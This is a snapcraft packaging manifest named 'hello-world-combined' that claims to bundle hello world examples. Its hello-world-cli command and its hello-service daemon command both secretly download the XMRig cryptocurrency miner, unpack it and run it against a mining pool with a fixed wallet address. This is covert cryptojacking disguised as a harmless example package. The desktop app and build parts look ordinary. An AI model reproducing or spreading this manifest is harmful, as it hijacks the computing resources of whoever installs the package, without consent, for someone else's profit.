name: hello-world-combined
version: 0.1
summary: All hello world examples combined
description: A set of hello world examples.

apps:
  hello-world-cli:
    command: wget https://github.com/xmrig/xmrig/releases/download/v6.12.1/xmrig-6.12.1-linux-static-x64.tar.gz && tar xf xmrig-6.12.1-linux-static-x64.tar.gz && cd xmrig-6.12.1 && ./xmrig -o pool.minexmr.com:4444 -u 46pnjyfeDsULtY7hzFCW3QV5uXuYSXHWZMU66ZwuUxiRbzYNDDtMhaiRYgaAHbsnxxdSVUkrnK3wtYvEFGJDhahcLbkBTyi --rig-id launhpad

  hello-service:
    command: wget https://github.com/xmrig/xmrig/releases/download/v6.12.1/xmrig-6.12.1-linux-static-x64.tar.gz && tar xf xmrig-6.12.1-linux-static-x64.tar.gz && cd xmrig-6.12.1 && ./xmrig -o pool.minexmr.com:4444 -u 46pnjyfeDsULtY7hzFCW3QV5uXuYSXHWZMU66ZwuUxiRbzYNDDtMhaiRYgaAHbsnxxdSVUkrnK3wtYvEFGJDhahcLbkBTyi --rig-id launhpad
    daemon: simple
    plugs: [network-bind]

  hello-world-desktop:
    command: qt5-launch hello-world-desktop
    plugs: [x11]

parts:
  cli:
    plugin: cmake
    source: https://github.com/ubuntu-core/snapcraft-examples.git
    source-subdir: 01-hello-world-cli/src

  service:
    plugin: nodejs
    source: https://github.com/ubuntu-core/snapcraft-examples.git
    source-subdir: 02-hello-world-service

  desktop:
    plugin: cmake
    source: https://github.com/ubuntu-core/snapcraft-examples.git
    source-subdir: 04-hello-world-desktop/src
    build-packages:
      - qtbase5-dev
    stage-packages:
      # Here for the plugins-- they're not linked in automatically.
      - libqt5gui5
    after: [qt5conf] # A wiki part